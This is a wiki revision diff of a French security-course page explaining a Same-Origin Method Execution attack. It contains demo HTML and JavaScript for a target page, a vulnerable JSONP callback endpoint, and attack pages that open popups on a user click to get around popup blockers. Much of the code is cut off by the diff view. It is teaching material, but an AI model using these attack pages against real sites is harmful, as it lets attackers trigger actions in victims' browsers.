secres:some
Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
secres:some [2017/11/23 10:52] – orel | secres:some [2024/03/18 15:06] (current) – external edit 127.0.0.1 | ||
---|---|---|---|
Line 7: | Line 7: | ||
//La démonstration suivante a été mise en oeuvre avec le navigateur Google Chrome.// | //La démonstration suivante a été mise en oeuvre avec le navigateur Google Chrome.// | ||
- | Soit le site web " | + | Considérons |
+ | |||
+ | <code html attackme.html> | ||
+ | < | ||
+ | < | ||
+ | function hello() { | ||
+ | document.write(" | ||
+ | } | ||
+ | function hack() { | ||
+ | document.write(" | ||
+ | } | ||
+ | hello(); | ||
+ | </ | ||
+ | </ | ||
+ | </ | ||
+ | |||
+ | |||
+ | |||
+ | Par ailleurs, le site possède un callback endpoint vulnérable (typiquement du JSONP ou du Flash). Ici le endpoint vulnérable est juste un programme callback.php (http:// | ||
* http:// | * http:// | ||
Line 21: | Line 39: | ||
</ | </ | ||
- | Imaginons que la victime souhaitant visiter la page http:// | + | Imaginons que la victime souhaitant visiter la page http:// |
Par exemple : [[http:// | Par exemple : [[http:// | ||
- | Afin de contourner les popups blocker (celui interne à Google Chrome et/ou les plugins comme AdBlock), ils existent de multiples techniques... La plus simple consiste à ouvrir le popup après un //click// utilisateur... | + | Afin de contourner les popups blocker (celui interne à Google Chrome et/ou les plugins comme AdBlock), ils existent de multiples techniques. La plus simple |
+ | <code html attack-click.html> | ||
+ | < | ||
+ | < | ||
+ | <h1> Main Attack Page</ | ||
+ | < | ||
+ | function redirect() { | ||
+ | window.open("/ | ||
+ | window.location.replace(" | ||
+ | } | ||
+ | </ | ||
+ | <button onclick=" | ||
+ | </ | ||
+ | </ | ||
+ | </ | ||
- | (...) | + | <code html win1.html> |
+ | < | ||
+ | < | ||
+ | <h1> Win 1</ | ||
+ | < | ||
+ | < | ||
+ | function waitForDOM() { | ||
+ | window.location.replace(" | ||
+ | } | ||
+ | setTimeout(waitForDOM, | ||
+ | </ | ||
+ | </ | ||
+ | |||
+ | </ | ||
+ | </ | ||
secres/some.1511434369.txt.gz · Last modified: 2024/03/18 15:05 (external edit)